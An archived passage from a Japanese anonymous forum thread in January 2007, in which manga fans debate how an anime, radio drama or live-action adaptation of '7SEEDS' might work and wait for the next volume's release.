ただ、クオリティに期待は出来ないんだろうけど…。

518 :花と名無しさん:2007/01/24(水) 09:21:56 ID:???O
つかアニメ化しても中途半端に食って最後まで出来ないのは目に見えないからなぁ
夏Aの選抜試験だけを1クール掛けてやってあとはOVAとかなら未だしも

519 :花と名無しさん:2007/01/24(水) 13:50:34 ID:???0
夏Aの選抜はつかみとしては最適だけど、
そこから七種に入ると他のチームがぬるく見えるんじゃないか?
冬チームは別としても。

520 :花と名無しさん:2007/01/24(水) 14:04:49 ID:???0
夏Aの選抜だけやっても単なるサバイバル物だしな。
あくまでXデー以降生き残った人たちの話が主題だと思うし。
1クールなら4巻までを夏B、春、冬でやって残りは続編で、と言うのがいいと思うけど、
BASARAでは続編予定だったのをキャンセルされたしなあ。
ってことで受賞のご褒美はBASARAのリメイクってことで。完結してるしやりやすいだろうし。
7種はゴールが近づいてからあらためてしっかり作ってもらうとして。

521 :花と名無しさん:2007/01/24(水) 14:14:18 ID:???O
原作ファンはじっくり作って続編に期待
って姿勢なんだけど
作り手の方は次回作作る時まで人気が持続してるかはわからないし
その時旬の作品放映した方がキャッチーだからって理由で
結局面白いというか大筋だけ取って来て
見たやつは何この超展開、あのサブイベントがいいのに
原作が凌辱されたぁぁ

が今のアニメ業界だからね
期待すんな(`ε´)

522 :902:2007/01/24(水) 17:26:32 ID:???0
ラジオドラマで十分

523 :花と名無しさん:2007/01/24(水) 17:46:51 ID:???O
そうだ、ラジオドラマでまだ夏Aやってないじゃないか。
そっちの方がすごく聴きたい。
声優で一瞬で百舌が誰かわかってしまうけど、もうほぼ確定してるから問題無いし。
ただ、7種は画面的な広がりも重要な物語だから、やっぱり映像で見てみたい気もするね。

524 :花と名無しさん:2007/01/24(水) 18:38:16 ID:???0
マーク編の巨大扇風機を実写で見たい。

525 :花と名無しさん:2007/01/24(水) 18:39:30 ID:???0
早くコミクス出ないかなー
マークの話が読みたいw

526 :花と名無しさん:2007/01/24(水) 19:28:13 ID:???0
小学館の発売予定見る限り、2月には出ないね。
3月かな?

527 :花と名無しさん:2007/01/24(水) 23:01:04 ID:???O
映画やドラマにするには、登場人物があまりに多くて大変そうだね。
アメリカのドラマシリーズみたいに、何シーズンも続くなら面白くなりそうだけど。
でも実写だと、冒頭の白いゴキ集団とか共食いとか見せられただけで挫折しそう…
グロ展開よりも妙にリアルで生理的にキツイと感じてしまいそう。
それを乗り越えれば俄然面白くなる訳だが、漫画でも虫エピは結構きつかったな

528 :花と名無しさん:2007/01/24(水) 23:04:47 ID:???0
3月かぁ。まだまだ先だね・・・。
早く10巻読みたいよ。

133 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)